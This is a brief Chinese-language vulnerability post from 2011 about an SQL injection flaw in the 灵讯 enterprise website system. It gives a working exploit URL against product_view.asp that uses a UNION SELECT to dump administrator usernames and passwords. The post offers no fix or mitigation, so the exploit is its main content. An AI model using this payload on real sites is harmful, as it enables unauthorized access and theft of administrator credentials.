灵讯企业网站系统 SQL注入漏洞
时间:2011-04-19 来源:黑白前线
发布日期:2011-04.19
发布作者:佚名
漏洞类型:SQL注入
漏洞描述:灵讯企业网站系统程序未进行SQL注入过滤导致SQL注射漏洞。
漏洞测试EXP:
Demo:
http://localhost/product_view.asp?id=23 union select 1,user_name,password,4,5,6,7,8,9,10 from administrator
标签分类:
相关阅读 更多 +
排行榜 更多 +